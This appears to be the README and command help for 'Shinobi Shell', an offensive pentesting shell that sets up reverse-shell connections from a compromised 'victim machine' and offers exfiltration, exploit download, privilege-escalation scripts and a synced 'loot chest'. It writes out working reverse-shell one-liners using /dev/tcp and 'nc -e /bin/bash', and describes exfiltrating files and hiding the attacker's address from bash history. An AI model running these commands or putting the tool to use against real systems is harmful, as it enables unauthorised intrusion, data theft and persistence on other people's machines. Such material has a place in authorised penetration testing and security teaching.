An experimental shell that handles file exfiltration, exploit injection and various other obnoxious tasks.
usage: PROG [options]
Shinobi shell is a shell specifically designed to make exfiltration, proxying,
persistance and other pentesting actions easier.
optional arguments:
-h, --help show this help message and exit
-a, --autoload Listens for a incoming shell. Then autoloads shinobi shell onto the target
-t, --ttyCheat Shows tty shell cheat sheet (need a tty shell for shinobi shell to work)
-c, --connect Flag that indicates a reverse shell connection (use this on victim machine)
-l LISTEN, --listen LISTEN
Starts Shinobi Shell listener on port passed in
-k, --key Will create an encrpyted tunnel if encrpytion libs available
-r SERVERADDRESS, --serveraddress SERVERADDRESS
Local IP Address used for universal reverse shell
handler (optional - use if different than default)
./shinobishell.py -l 4443 -k
-l
Port server will listen on
-k
Requesting an encrypted tunnel server (optional but if used, required by all connections)
Client (Penetrated box)
./shinobishell.py -c -k
-c
Connect back to a server
-k
Try and make an encrytped tunnel
For both server and client, you'll be prompted for a password when using -k
For -c
you will be prompted at run time for the server address
Both -c
and -k
were moved to runtime inputs to prevent leaking attacking machine address and key in bash history
./shinobishell.py -a
Shinobi Tunnel Plaintext ~~ Be aware
Which port to listen on: 1000
What is the ShinobiServer address:port combination: 127.0.0.1:443
Send a reverse shell
(tested and known to work)
/bin/bash -i >& /dev/tcp/127.0.0.1/1000 0>&1
nc 127.0.0.1 1000 -e /bin/bash
nc 127.0.0.1 1000 -e /bin/sh
Shinobi Shell v1.0
Author: Anthony Russell
Contact: Twitter @DotNetRussell
Blog: https://DotNetRussell.com (don't hack me bro)
Commands:
help - displays help information
machineinfo - displays a series of machine variables to help with priv esc
searchsploit - <search text> sends a searchsploit command back to your attacking machine and returns the results through shinobi tunnel
exfil <file name> - exfiltrates a file back to your attacking machine via shinobi tunnel
ssdownload <exploit path> - downloads a search sploit exploit from your attacking machine
download <url> - does a wget for your file on your attacking machine and then transfers it to you over shinobi tunnel
linenumdownlods - linenum.sh to the Shinobi Server and then transfers it back to the client
suid3num - downloads suid3num.py to the Shinobi server and then transfers it back to the client
Loot Chest:
loot store <key> <value> - stores a key value pair in your loot chest
loot <key> - gets a loot value
loot show - shows everything in loot chest
NOTE: Loot chest auto syncs with attacking machine
Auto Aliases
lsa == ls -la